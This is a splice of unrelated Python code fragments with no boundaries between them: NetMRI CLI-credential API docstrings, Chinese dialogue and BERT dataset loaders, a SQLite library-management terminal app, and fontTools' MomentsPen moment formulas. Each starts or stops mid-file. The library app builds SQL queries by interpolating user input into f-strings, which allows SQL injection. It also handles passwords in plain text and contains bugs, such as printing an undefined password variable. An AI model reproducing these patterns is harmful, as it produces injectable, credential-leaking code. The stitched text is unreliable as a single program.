| ``api version max:`` None | ``required:`` False | ``default:`` None :param Priority: The priority order in which to attempt this credential. If omitted, this field will not be updated. :type Priority: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param Protocol: The protocol for which to use this credential. If omitted, this field will not be updated. :type Protocol: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param UnitID: The internal NetMRI identifier for the NetMRI collector on which the credential is configured. If omitted, this field will not be updated. :type UnitID: Integer | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param UsernameSecure: The username portion of the credential. If omitted, this field will not be updated. :type UsernameSecure: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param Vendor: The vendor devices against which to try this credential. If omitted, this field will not be updated. :type Vendor: String **Outputs** | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return id: The id of the updated cli credential. :rtype id: Integer | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return model: The class name of the updated cli credential. :rtype model: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return uri: A URI that may be used to retrieve the updated cli credential. :rtype uri: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return cli_credential: The updated cli credential. :rtype cli_credential: CLICredential """ return self.api_request(self._get_method_fullname("update"), kwargs) def destroy(self, **kwargs): """Deletes the specified cli credential from NetMRI. **Inputs** | ``api version min:`` None | ``api version max:`` None | ``required:`` True | ``default:`` None :param id: The internal NetMRI identifier for this credential. :type id: Integer **Outputs** """ return self.api_request(self._get_method_fullname("destroy"), kwargs) def test_ssh_telnet(self, **kwargs): """Executes cli credential test and returns results or status id based on async_ind **Inputs** | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param DeviceID: Device ID to specify what device to test cli credentials on (takes precedence over IP address) :type DeviceID: Integer | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param UnitID: ID of the collector to send the request to, OC only :type UnitID: Integer | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param ip_address: IP Address to test id DeviceID is not given :type ip_address: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param VirtualNetworkID: The ID for Virtual Network, must be unique, only needed if DeviceID not set :type VirtualNetworkID: Integer | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param ssh_username: SSH username :type ssh_username: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param ssh_password: SSH password :type ssh_password: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param telnet_username: Telnet username :type telnet_username: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param telnet_password: <PASSWORD> :type telnet_password: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param enable_password: Enable mode password :type enable_password: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` False :param async_ind: When false, the credential test will be run synchronously, and the API call will block until it is complete. When true, credential test id will be returned to use for subsequent calls :type async_ind: Boolean **Outputs** | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return text: When async_ind is false, credential test text will be returned upon completion. :rtype text: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return id: The internal #{Brand.lookup(:PRODUCT_NAME_ONLY)} identifier for previously initiated credential test. :rtype id: String """ return self.api_request(self._get_method_fullname("test_ssh_telnet"), kwargs)
for sample in data: c = sample[0].split('<eou>') c = [i.strip() for i in c] c.append(sample[1]) contexts.append(c) # retrieval list retrieval_list.append(sample[2:2+retrieval_size]) for context, retrieval in tqdm(list(zip(contexts, retrieval_list))): bundle = dict() bundle['context_text'] = ''.join(context) ids = [self.vocab.cls_token_id] for utterance in context: ids.extend([self.vocab.convert_tokens_to_ids(word) for word in utterance]) ids.append(self.vocab.sep_token_id) # length size of the context ids = ids[-self.src_len_size:] bundle['context_id'] = torch.LongTensor(ids) # retrieval list bundle['retrieval_list_text'] = retrieval retrieval_list_ = [] for i in retrieval: ids = [self.vocab.cls_token_id] ids.extend([self.vocab.convert_tokens_to_ids(word) for word in i]) ids.append(self.vocab.sep_token_id) ids = ids[:self.src_len_size] retrieval_list_.append(torch.LongTensor(ids)) bundle['retrieval_list'] = retrieval_list_ self.data.append(bundle) else: contexts, responses, retrieval_list = [], [], [] for sample in data: c = sample[0].split('<eou>') c = [i.strip() for i in c] contexts.append(c) responses.append(sample[1]) # retrieval list retrieval_list.append(sample[2:2+retrieval_size]) for c, r, r_ in tqdm(list(zip(contexts, responses, retrieval_list))): bundle = dict() bundle['context_text'] = ''.join(c) bundle['reply_text'] = r bundle['retrievl_list_text'] = r_ # ids ids = [self.vocab.cls_token_id] for utterance in c: ids.extend([self.vocab.convert_tokens_to_ids(word) for word in utterance]) ids.append(self.vocab.sep_token_id) ids = ids[-self.src_len_size:] bundle['context_id'] = torch.LongTensor(ids) ids = [self.vocab.cls_token_id] ids.extend([self.vocab.convert_tokens_to_ids(word) for word in r]) ids.append(self.vocab.sep_token_id) ids = ids[:self.tgt_len_size] bundle['reply_id'] = torch.LongTensor(ids) # retrieval ids retrieval_list_ = [] for i in r_: ids = [self.vocab.cls_token_id] ids.extend([self.vocab.convert_tokens_to_ids(word) for word in i]) ids.append(self.vocab.sep_token_id) ids = ids[:self.src_len_size] retrieval_list_.append(torch.LongTensor(ids)) bundle['retrieval_list'] = retrieval_list_ self.data.append(bundle) print(f'[!] read and process raw dara from {path} over') def __len__(self): return len(self.data) def __getitem__(self, i): return self.data[i] class DialogDataset(Dataset): ''' Construct the dataset, use once for one epoch Tokenizer is the function, default jieba.cut; You can also set is the list for no tokenization ''' def __init__(self, path, mode='train', vocab=None, tokenizer=jieba.cut, n_vocab=50000, src_len_size=100, tgt_len_size=20): self.mode = mode self.tokenizer = tokenizer self.src_len_size = src_len_size self.tgt_len_size = tgt_len_size # load data data = read_csv_data(path) responses, contexts = [], [] for sample in tqdm(data): responses.append(list(self.tokenizer(sample[1]))) rc, c = [], sample[0].split('<eou>') for utterance in c: rc.extend(list(self.tokenizer(utterance.strip()))) rc.append('<eou>') rc = rc[:-1] contexts.append(rc) print(f'[!] read raw data from {path} over') # process the dataset if mode == 'train': self.vocab = vocabulary( (contexts, responses), n_vocab=n_vocab) else: assert vocab, 'vocab not the NoneType for test/dev mode' self.vocab = vocab self.data = [] # init the data for c, r in zip(contexts, responses): bundle = dict() bundle['context_text'] = ' '.join(c) bundle['reply_text'] = ' '.join(r) bundle['context_id'] = torch.LongTensor(self.vocab.toks2idx(c, self.src_len_size)) bundle['reply_id'] = torch.LongTensor(self.vocab.toks2idx(r, self.tgt_len_size)) bundle['context_l'] = bundle['context_id'].shape[0] bundle['reply_l'] = bundle['reply_id'].shape[0] self.data.append(bundle) print(f'[!] {mode} dataset init over, size: {len(self.data)}') print(f'[!] example:') example = random.choice(self.data) print(f'CTX: {example["context_text"]}') print(f'REF: {example["reply_text"]}') def __getitem__(self, i): bundle = self.data[i] cid, cid_l, rid, rid_l = bundle['context_id'], \ bundle['context_l'], bundle['reply_id'], bundle['reply_l'] return cid, cid_l, rid, rid_l def __len__(self): return len(self.data) class BERTNLIDataset(Dataset): ''' BERT NLI Datset for Chinese ''' def __init__(self, path, max_len=300, vocab_file='data/vocab/vocab_small'): data = read_json_data(path) self.vocab = BertTokenizer(vocab_file=vocab_file) self.max_len = max_len self.pp_path = f'{os.path.splitext(path)[0]}.pkl' if os.path.exists(self.pp_path): with open(self.pp_path, 'rb') as f: self.data = pickle.load(f) print(f'[!] load preprocessed file from {self.pp_path}') # Dataset object must return None return None self.data = [] d_ = [] label_map = {'contradiction': 0, 'neutral': 1, 'entailment': 2} for i in data: s1, s2, label = i['sentence1'], i['sentence2'], i['gold_label'] d_.append((s1, s2, label)) for item in tqdm(d_): bundle = {} s1, s2, label = item s = f'{s1} [SEP] {s2}' sid = self.vocab.encode(s) bundle['sid'] = torch.LongTensor(sid) bundle['label'] = label_map[label] self.data.append(bundle) def __len__(self): return len(self.data) def __getitem__(self, i): bundle = self.data[i] return bundle def save_pickle(self): with open(self.pp_path, 'wb') as f: pickle.dump(self.data, f) print(f'[!] save dataset into {self.pp_path}') class BERTLOGICDataset(Dataset): ''' BERT LOGIC Dataset: similar with the BERTIRDataset The negative samples are chosen by the IR systems, which have the high semantic coherence but low logic coherence. The whole `train_retrieval` corpus is huge, only use 500000 samples ''' def __init__(self, path, mode='train', max_len=300, samples=1, vocab_file='data/vocab/vocab_small'): self.mode = mode self.max_len = max_len # data = read_csv_data(path) data = read_text_data(path) data = random.sample(data, 500000) # context and response are all the negative samples contexts = [i[0] for i in data] self.vocab = BertTokenizer(vocab_file=vocab_file) self.pp_path = f'{os.path.splitext(path)[0]}_logic.pkl' if os.path.exists(self.pp_path): with open(self.pp_path, 'rb') as f: self.data = pickle.load(f) print(f'[!] load preprocessed file from {self.pp_path}') return None self.data = [] self.max_len = max_len self.es = Elasticsearch() # collect the data samples d_ = [] with tqdm(total=len(data)) as pbar: idx, batch_size = 0, 1000 while idx < len(data): contexts = [i[0] for i in data[idx:idx+batch_size]] responses = [i[1] for i in data[idx:idx+batch_size]] negatives = generate_logic_negative_samples( contexts, self.es, "retrieval_chatbot", samples=samples) for each in zip(contexts, responses, negatives): d_.append((each[0], [each[1]] + each[2])) idx += batch_size pbar.update(batch_size) if mode in ['train', 'dev']: # concatenate the context and the response for item in tqdm(d_): context, response = item context_id = self.vocab.encode(context) for idx, r in enumerate(response): bundle = dict() rid = self.vocab.encode(r) bundle['context_id'] = context_id + rid[1:] bundle['label'] = 1 if idx == 0 else 0 self.data.append(bundle) else: for item in tqdm(d_): context, response = item context_id = self.vocab.encode(context) res_ids = [self.vocab.encode(i) for i in response] bundle = dict() bundle['context_id'] = context_id bundle['reply_id'] = res_ids bundle['label'] = [1] + [0] * samples self.data.append(bundle) def __len__(self): return len(self.data) def __getitem__(self, i): bundle = self.data[i] if self.mode in ['train', 'dev']: ids = torch.LongTensor(bundle['context_id'][-self.max_len:]) else: ids = [] for i in range(len(bundle['reply_id'])): p = bundle['context_id'] + bundle['reply_id'][i][1:] ids.append(torch.LongTensor(p[-self.max_len:])) return ids, bundle['label'] def save_pickle(self): with open(self.pp_path, 'wb') as f: pickle.dump(self.data, f) print(f'[!] save dataset into {self.pp_path}') class BERTIRMultiDataset(Dataset): ''' training samples (positive:negative): 1:1 test samples (positive:negative) 1:9 turn_size controls the turn_size of the multi-turn conversations ''' def __init__(self, path, mode='train', max_len=300, samples=9, turn_size=3, vocab_file='data/vocab/vocab_small'): self.mode = mode data = read_text_data(path) responses = [i[-1] for i in data] self.vocab = BertTokenizer.from_pretrained('bert-base-chinese') self.pp_path = f'{os.path.splitext(path)[0]}_multiir.pkl' if os.path.exists(self.pp_path): with open(self.pp_path, 'rb') as f: self.data = pickle.load(f) print(f'[!] load preprocessed file from {self.pp_path}') return None self.data = [] sep_id = self.vocab.convert_tokens_to_ids('[SEP]') self.max_len = max_len # collect the samples d_ = [] for context, response in data: negative = generate_negative_samples(response, responses, samples=1) d_.append((context, [response] + negative)) if mode in ['train', 'dev']: for contexts, responses in tqdm(d_): # recode the [SEP] index after tokenize if contexts.count('[SEP]') < turn_size: continue contexts_id = self.vocab.encode(contexts) for idx, r in enumerate(responses): bundle = dict() rid = self.vocab.encode(r)[1:] # without [CLS] ids = contexts_id + rid if len(ids) > 512: continue bundle['ids'] = ids bundle['label'] = 1 if idx == 0 else 0 bundle['turn_length'] = bundle['ids'].count(sep_id) sep_index = (np.array(ids) == sep_id).astype(np.int).nonzero()[0] sep_chunk_size, last_sep = [], 0 for sep_idx in sep_index: sep_chunk_size.append(sep_idx - last_sep + 1) last_sep = sep_idx + 1 bundle['sep_index'] = sep_chunk_size self.data.append(bundle) else: for item in tqdm(d_): contexts, responses = item contexts_id = [self.vocab.encode(context)[-self.max_len:] for context in contexts] res_ids = [self.vocab.encode(i)[-self.max_len] for i in responses] bundle = dict() bundle['ids'] = contexts_id bundle['replys_id'] = res_ids bundle['label'] = [1] + [0] * samples bundle['turn_length'] = len(bundle['ids']) + 1 self.data.append(bundle) self.data = sorted(self.data, key=lambda i:i['turn_length']) print(f'[!] read the processed raw data from {path} over') def __len__(self): return len(self.data) def save_pickle(self): with open(self.pp_path, 'wb') as f: pickle.dump(self.data, f) print(f'[!] save the dataset into {self.pp_path}') def __getitem__(self, i): return self.data[i] class BERTIRMultiDataLoader: def __init__(self, data, shuffle=True, batch_size=16): self.data = data self.data_size = len(data) self.shuffle = shuffle self.batch_size = batch_size self.lengths = [i['turn_length'] for i in self.data.data] self.index, self.pad = 0, 0 def __iter__(self): return self def __len__(self): return self.data_size def __next__(self): if self.index >= self.data_size: self.index = 0 raise StopIteration else: idx, start1 = self.index, self.lengths[self.index] for l in self.lengths[self.index:self.index+self.batch_size]: if l != start1: break idx += 1 batch = self.data[self.index:idx] # batch*[turn, seq] if self.shuffle: random.shuffle(batch) self.index = idx if self.data.mode in ['train', 'dev']: # construct the tensor # batch: batch*[turn, seq] -> turn*[batch, seq] with the [PAD] ids = [torch.LongTensor(i['ids']) for i in batch] ids = pad_sequence(ids, batch_first=True, padding_value=self.pad) # [batch, seq] sep_index = [i['sep_index'] for i in batch] labels = torch.LongTensor([i['label'] for i in batch]) # rest: turn_size*[batch, seq]; labels: [batch] if torch.cuda.is_available(): ids = ids.cuda() labels = labels.cuda() return ids, labels, sep_index else: rest, turn_size = [], len(batch[0]) contexts, responses, labels = [item['ids'] for item in batch], [item['replys_ids']
# Import necessary modules import sqlite3 import pandas as pd from pandas import DataFrame from datetime import datetime as dt ########### ## MENUS ## ########### main_menu = ''' ########################################################## What would you like to do today? 1 --- Login as Librarian 2 --- Login as User 3 --- Register as a User/Librarian Please type any key and press enter to quit ########################################################## >>> ''' librarian_menu = ''' ######################################################### What would you like to do today? 1 --- Check Account Details 2 --- Update your User Info 3 --- Delete your Account 4 --- Add Books to the Database 5 --- Update Book Details in the Database 6 --- Delete a Book from the Database 7 --- See All Books and their Status 8 --- Who Owes Me Money? 9 --- Rented Books? Please type any key and press enter to log out ######################################################### >>> ''' user_menu = ''' ########################################################## What would you like to do today? 1 --- Check Account Details 2 --- Update your User Info 3 --- Delete your Account 4 --- See Available Books 5 --- See All Books and their Status 6 --- See All Books you've rented 7 --- Rent a Book 8 --- Return a Book 9 --- Check my fees Please type any key and press enter to log out ######################################################### >>> ''' month_days = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31] ############################ ##### HELPER FUNCTIONS ##### ############################ # Query the books table and return a list of all the books def generate_book_list(): con = sqlite3.connect('terminal_mgt_system.db') query = f''' SELECT * FROM books ''' book_list = DataFrame(pd.read_sql(query,con)) if book_list.empty: print("There are no books at the library") return DataFrame() print("Here's a table of all the books we have and their current status:") print(book_list) print("\n") return book_list # Query the books table and return a list of available books def generate_available_book_list(): con = sqlite3.connect('terminal_mgt_system.db') query = f''' SELECT * FROM books WHERE rented == 0 ''' book_list = DataFrame(pd.read_sql(query,con)) if book_list.empty: print("There are no books available right now. Please try again later.") return DataFrame() print("Here's a table of all available books:") print(book_list[['book_id','name','author','description']]) print("\n") return book_list # Query the books table and return a list of people who owe fees to the librarian def people_who_owe_money(): query = ''' SELECT user_id, username, name, contact_information,fees FROM users WHERE fees > 0 ''' con = sqlite3.connect('terminal_mgt_system.db') data = pd.read_sql(query,con) if data.empty: print("No one owes the library money.") else: print("Here's a list of people who owe the library money:") print(data) print("\n") # Query books table and return a list of people who are overdue def rented_books(): query = f''' SELECT name,rented,rented_at,rented_by FROM books -- JOIN users ON books.rented_by = users.username WHERE books.rented = 1 ''' con = sqlite3.connect("terminal_mgt_system.db") data = pd.read_sql(query,con) print("natha") if data.empty: print("No one is overdue...YET!") else: print("Here's a list of people who are overdue: ") print(data) print("\n") def get_fine(ask): query = f''' SELECT rented_at FROM books WHERE book_id = {ask} ''' con = sqlite3.connect('terminal_mgt_system.db') cur = con.cursor() cur.execute(query) rent_date = cur.fetchall() rented_month = rent_date[0][0][5] + rent_date[0][0][6] rented_day = rent_date[0][0][8] + rent_date[0][0][9] r_month = int(rented_month) r_day = int(rented_day) date = dt.today() cur_date = str(date) cur_month = cur_date[5] + cur_date[6] cur_day = cur_date[8] + cur_date[9] c_month = int(cur_month) c_day = int(cur_day) if(c_month == r_month) : days_rented = c_day - r_day else : days_rented = c_day + (month_days[r_month-1] - r_day) fees = 0 if(days_rented > 3) : fees = (days_rented-3) *5 return days_rented, fees ########################### ### OBJECTS FOR THE APP ### ########################### # The base class for the librarian and user class main_class: def __init__(self,username,password,name,contact_information): self.username = username self.password = password self.name = name self.contact_information = contact_information self.loggedIn = False # Check account details def check_details(self): print("Here are your account details") print(f''' Username: {self.username} Password: {<PASSWORD>} Name: {self.name} Contact Information: {self.contact_information} ''') # Delete my account def delete_self(self): table = "users" if self.__class__.__name__ == "user_class" else "librarian" response = input("Are you sure you want to delete your account? Please answer Yes or No\n>>> ") if response.strip().lower() == "yes": con = sqlite3.connect('terminal_mgt_system.db') query = f''' DELETE FROM {table} WHERE username = "{self.username}"; ''' con.execute(query) con.commit() con.close() # Update personal information def update_info(self): table = "users" if self.__class__.__name__ == "user_class" else "librarian" response = input(''' What field would you like to up date? You cannot update your username. 1 --- Name 2 --- Contact Information 3 --- Password >>> ''') if response.strip() not in ["1","2","3"]: print("Enter a valid option") else: if response == "1": name = input("Enter your new name now.\n>>> ") print(f"Here's your new name: {name}") print("Updating now...") self.name = name query = f''' UPDATE {table} SET name = "{name}" WHERE username = "{self.username}"; ''' elif response == "2": contact_information = input("Enter your new email address now.\n>>> ") print(f"Here's your new contact_info: {contact_information}") print("Updating now...") self.contact_information = contact_information query = f''' UPDATE {table} SET contact_information = "{contact_information}" WHERE username = "{self.username}"; ''' elif response == "3": password = input("Enter your new password now.\n>>> ") print(f"Here's your new password: {password}") print("Updating now...") self.password = password query = f''' UPDATE {table} SET password = "{password}" WHERE username = "{self.username}"; ''' con = sqlite3.connect('terminal_mgt_system.db') con.execute(query) con.commit() con.close() print("Updated your info!") # The librarian class class librarian_class(main_class): def __init__(self,username, password, name, contact_information): main_class.__init__(self,username,password,name,contact_information) # Librarian can add books to the database using this method def add_books(self): print("Welcome to add a book feature! Please enter the information as requested...") book_name = input("What's the name of the book?\n>>>") while book_name == "": book_name = input("What's the name of the book?\n>>>") book_author = input("What's the author's name?\n>>>") while book_author == "": book_author = input("What's the name of the book?\n>>>") book_description = input("Please give a small description of the book.\n>>> ") while book_description == "": book_description = input("What's the name of the book?\n>>>") print(f''' Here's the information we're updating to the system. You can always edit or delete the book from the options menu: Book Name: {book_name} Author: {book_author} Description: {book_description} ''') input("Press enter to proceed.") query = ''' INSERT INTO books (author,name,description) VALUES (?,?,?) ''' print("Updating the database now...") con = sqlite3.connect('terminal_mgt_system.db') con.execute(query,(book_name,book_author,book_description)) con.commit() con.close() print("Added the book to the database!") # Librarian can update book details using this method def update_book_details(self): book_list = generate_book_list() try: ask = int(input("What Book ID would you like to update?\n>>> ")) if ask not in book_list['book_id'].values: print("Book ID not in database.") self.update_book_details() else: response = input(''' What information about the book would you like to update? Please enter 1, 2, or 3 1 --- Book Name 2 --- Book Author 3 --- Book Description >>> ''') if response.strip() not in ["1","2","3"]: print("Enter a valid option") self.update_info() else: if response == "1": name = input("Enter the new name now.\n>>> ") print(f"Here's your new book name: {name}") print("Updating now...") query = f''' UPDATE books SET name = "{name}" WHERE book_id = "{ask}"; ''' elif response == "2": author = input("Enter the new author.\n>>> ") print(f"Here's the new author: {author}") print("Updating now...") query = f''' UPDATE books SET author = "{author}" WHERE book_id = "{ask}"; ''' elif response == "3": description = input("Enter the new description.\n>>> ") print(f"Here's your new password: {password}") print("Updating now...") query = f''' UPDATE books SET description = "{description}" WHERE book_id = "{ask}"; ''' con = sqlite3.connect('terminal_mgt_system.db') con.execute(query) con.commit() con.close() print("Updated the book successfully") generate_book_list() except: print("Please enter a valid ID") # The librarian can delete books from the database using this method def delete_books(self): book_list = generate_book_list() ask = int(input("What book ID would you like to delete?\n>>> ")) try: if ask not in book_list['book_id'].values : print("Book ID not in database.") else: query = f''' DELETE FROM books WHERE book_id = {ask} ''' print("Here's the book you're trying to delete:") print(book_list[book_list['book_id']==ask]) response = input("Proceed? Yes or No?\n>>> ") if response.strip().lower() == "yes": print("Deleting the book now...") con = sqlite3.connect('terminal_mgt_system.db') con.execute(query) con.commit() con.close() print("The book has been deleted.") else: print("Not deleting book.") except: print("Please enter a valid book ID") # Creating a user object class user_class(main_class): def __init__(self,username,password,name,contact_information,fees): main_class.__init__(self,username,password,name,contact_information) self.fees = fees #
<filename>Lib/fontTools/pens/momentsPen.py """Pen calculating 0th, 1st, and 2nd moments of area of glyph shapes. This is low-level, autogenerated pen. Use statisticsPen instead.""" from __future__ import print_function, division, absolute_import from fontTools.misc.py23 import * from fontTools.pens.basePen import BasePen __all__ = ["MomentsPen"] class MomentsPen(BasePen): def __init__(self, glyphset=None): BasePen.__init__(self, glyphset) self.area = 0 self.momentX = 0 self.momentY = 0 self.momentXX = 0 self.momentXY = 0 self.momentYY = 0 def _moveTo(self, p0): self.__startPoint = p0 def _closePath(self): p0 = self._getCurrentPoint() if p0 != self.__startPoint: self._lineTo(self.__startPoint) def _endPath(self): p0 = self._getCurrentPoint() if p0 != self.__startPoint: # Green theorem is not defined on open contours. raise NotImplementedError def _lineTo(self, p1): x0,y0 = self._getCurrentPoint() x1,y1 = p1 r0 = x1*y0 r1 = x1*y1 r2 = x1**2 r3 = x0**2 r4 = 2*y0 r5 = y0 - y1 r6 = r5*x0 r7 = y0**2 r8 = y1**2 r9 = x1**3 r10 = r4*y1 r11 = y0**3 r12 = y1**3 self.area += -r0/2 - r1/2 + x0*(y0 + y1)/2 self.momentX += -r2*y0/6 - r2*y1/3 + r3*(r4 + y1)/6 - r6*x1/6 self.momentY += -r0*y1/6 - r7*x1/6 - r8*x1/6 + x0*(r7 + r8 + y0*y1)/6 self.momentXX += -r2*r6/12 - r3*r5*x1/12 - r9*y0/12 - r9*y1/4 + x0**3*(3*y0 + y1)/12 self.momentXY += -r10*r2/24 - r2*r7/24 - r2*r8/8 + r3*(r10 + 3*r7 + r8)/24 - x0*x1*(r7 - r8)/12 self.momentYY += -r0*r8/12 - r1*r7/12 - r11*x1/12 - r12*x1/12 + x0*(r11 + r12 + r7*y1 + r8*y0)/12 def _qCurveToOne(self, p1, p2): x0,y0 = self._getCurrentPoint() x1,y1 = p1 x2,y2 = p2 r0 = 2*x1 r1 = r0*y2 r2 = 2*y1 r3 = r2*x2 r4 = 3*y2 r5 = r4*x2 r6 = 3*y0 r7 = x1**2 r8 = 2*y2 r9 = x2**2 r10 = 4*y1 r11 = 10*y2 r12 = r0*x2 r13 = x0**2 r14 = 10*y0 r15 = x2*y2 r16 = r0*y1 + r15 r17 = 4*x1 r18 = x2*y0 r19 = r10*r15 r20 = y1**2 r21 = 2*r20 r22 = y2**2 r23 = r22*x2 r24 = 5*r23 r25 = y0**2 r26 = y0*y2 r27 = 5*r25 r28 = 8*x1**3 r29 = x2**3 r30 = 30*y1 r31 = 6*y1 r32 = 10*r9*x1 r33 = 4*r7 r34 = 5*y2 r35 = 12*r7 r36 = r5 + 20*x1*y1 r37 = 30*x1 r38 = 12*x1 r39 = 20*r7 r40 = 8*r7*y1 r41 = r34*r9 r42 = 60*y1 r43 = 20*r20 r44 = 4*r20 r45 = 15*r22 r46 = r38*x2 r47 = y1*y2 r48 = 8*r20*x1 + r24 r49 = 6*x1 r50 = 8*y1**3 r51 = y2**3 r52 = y0**3 r53 = 10*y1 r54 = 12*y1 r55 = 12*r20 self.area += r1/6 - r3/6 - r5/6 + x0*(r2 + r6 + y2)/6 - y0*(r0 + x2)/6 self.momentX += -r10*r9/30 - r11*r9/30 - r12*(-r8 + y1)/30 + r13*(r10 + r14 + y2)/30 + r7*r8/30 + x0*(r1 + r16 - r17*y0 - r18)/30 - y0*(r12 + 2*r7 + r9)/30 self.momentY += r1*(r8 + y1)/30 - r19/30 - r21*x2/30 - r24/30 - r25*(r17 + x2)/30 + x0*(r10*y0 + r2*y2 + r21 + r22 + r26 + r27)/30 - y0*(r16 + r3)/30 self.momentXX += r13*(r11*x1 - 5*r18 + r3 + r36 - r37*y0)/420 + r28*y2/420 - r29*r30/420 - r29*y2/4 - r32*(r2 - r4)/420 - r33*x2*(r2 - r34)/420 + x0**3*(r31 + 21*y0 + y2)/84 - x0*(-r15*r38 + r18*r38 + r2*r9 - r35*y2 + r39*y0 - r40 - r41 + r6*r9)/420 - y0*(r28 + 5*r29 + r32 + r35*x2)/420 self.momentXY += r13*(r14*y2 + 3*r22 + 105*r25 + r42*y0 + r43 + 12*r47)/840 - r17*x2*(r44 - r45)/840 - r22*r9/8 - r25*(r39 + r46 + 3*r9)/840 + r33*y2*(r10 + r34)/840 - r42*r9*y2/840 - r43*r9/840 + x0*(-r10*r18 + r17*r26 + r19 + r22*r49 - r25*r37 - r27*x2 + r38*r47 + r48)/420 - y0*(r15*r17 + r31*r9 + r40 + r41 + r46*y1)/420 self.momentYY += r1*(r11*y1 + r44 + r45)/420 - r15*r43/420 - r23*r30/420 - r25*(r1 + r36 + r53*x2)/420 - r50*x2/420 - r51*x2/12 - r52*(r49 + x2)/84 + x0*(r22*r53 + r22*r6 + r25*r30 + r25*r34 + r26*r54 + r43*y0 + r50 + 5*r51 + 35*r52 + r55*y2)/420 - y0*(-r0*r22 + r15*r54 + r48 + r55*x2)/420 def _curveToOne(self, p1, p2, p3): x0,y0 = self._getCurrentPoint() x1,y1 = p1 x2,y2 = p2 x3,y3 = p3 r0 = 6*x2 r1 = r0*y3 r2 = 6*y2 r3 = 10*y3 r4 = r3*x3 r5 = 3*x1 r6 = 3*y1 r7 = 6*x1 r8 = 3*x2 r9 = 6*y1 r10 = 3*y2 r11 = x2**2 r12 = r11*y3 r13 = 45*r12 r14 = x3**2 r15 = r14*y2 r16 = r14*y3 r17 = x2*x3 r18 = 15*r17 r19 = 7*y3 r20 = x1**2 r21 = 9*r20 r22 = x0**2 r23 = 21*y1 r24 = 9*r11 r25 = 9*x2 r26 = x2*y3 r27 = 15*r26 r28 = -r25*y1 + r27 r29 = r25*y2 r30 = r9*x3 r31 = 45*x1 r32 = x1*x3 r33 = 45*r20 r34 = 5*r14 r35 = x2*y2 r36 = 18*r35 r37 = 5*x3 r38 = r37*y3 r39 = r31*y1 + r36 + r38 r40 = x1*y0 r41 = x1*y3 r42 = x2*y0 r43 = x3*y1 r44 = r10*x3 r45 = x3*y2*y3 r46 = y2**2 r47 = 45*r46 r48 = r47*x3 r49 = y3**2 r50 = r49*x3 r51 = y1**2 r52 = 9*r51 r53 = y0**2 r54 = 21*x1 r55 = x3*y2 r56 = 15*r55 r57 = 9*y2 r58 = y2*y3 r59 = 15*r58 r60 = 9*r46 r61 = 3*y3 r62 = 45*y1 r63 = r8*y3 r64 = y0*y1 r65 = y0*y2 r66 = 30*r65 r67 = 5*y3 r68 = y1*y3 r69 = 45*r51 r70 = 5*r49 r71 = x2**3 r72 = x3**3 r73 = 126*x3 r74 = x1**3 r75 = r14*x2 r76 = 63*r11 r77 = r76*x3 r78 = 15*r35 r79 = r19*x3 r80 = x1*y1 r81 = 63*r35 r82 = r38 + 378*r80 + r81 r83 = x1*y2 r84 = x2*y1 r85 = x3*y0 r86 = x2*x3*y1 r87 = x2*x3*y3 r88 = r11*y2 r89 = 27*r88 r90 = 42*y3 r91 = r14*r90 r92 = 90*x1*x2 r93 = 189*x2 r94 = 30*x1*x3 r95 = 14*r16 + 126*r20*y1 + 45*r88 + r94*y2 r96 = x1*x2 r97 = 252*r96 r98 = x1*x2*y2 r99 = 42*r32 r100 = x1*x3*y1 r101 = 30*r17 r102 = 18*r17 r103 = 378*r20 r104 = 189*y2 r105 = r20*y3 r106 = r11*y1 r107 = r14*y1 r108 = 378*r46 r109 = 252*y2 r110 = y1*y2 r111 = x2*x3*y2 r112 = y0*y3 r113 = 378*r51 r114 = 63*r46 r115 = 27*x2 r116 = r115*r46 + 42*r50 r117 = x2*y1*y3 r118 = x3*y1*y2 r119 = r49*x2 r120 = r51*x3 r121 = x3*y3 r122 = 14*x3 r123 = 30*r117 + r122*r49 + r47*x2 + 126*r51*x1 r124 = x1*y1*y3 r125 = x1*y2*y3 r126 = x2*y1*y2 r127 = 54*y3 r128 = 21*r55 r129 = 630*r53 r130 = r46*x1 r131 = r49*x1 r132 = 126*r53 r133 = y2**3 r134 = y3**3 r135 = 630*r49 r136 = y1**3 r137 = y0**3 r138 = r114*y3 + r23*r49 r139 = r49*y2 self.area += r1/20 - r2*x3/20 - r4/20 + r5*(y2 + y3)/20 - r6*(x2 + x3)/20 + x0*(r10 + r9 + 10*y0 + y3)/20 - y0*(r7 + r8 + x3)/20 self.momentX += r13/840 - r15/8 - r16/3 - r18*(r10 - r19)/840 + r21*(r10 + 2*y3)/840 + r22*(r2 + r23 + 56*y0 + y3)/168 + r5*(r28 + r29 - r30 + r4)/840 - r6*(10*r14 + r18 + r24)/840 + x0*(12*r26 + r31*y2 - r37*y0 + r39 - 105*r40 + 15*r41 - 30*r42 - 3*r43 + r44)/840 - y0*(18*r11 + r18 + r31*x2 + 12*r32 + r33 + r34)/840 self.momentY += r27*(r10 + r19)/840 - r45/8 - r48/840 + r5*(10*r49 + r57*y1 + r59 + r60 + r9*y3)/840 - r50/6 - r52*(r8 + 2*x3)/840 - r53*(r0 + r54 + x3)/168 - r6*(r29 + r4 + r56)/840 + x0*(18*r46 + 140*r53 + r59 + r62*y2 + 105*r64 + r66 + r67*y0 + 12*r68 + r69 + 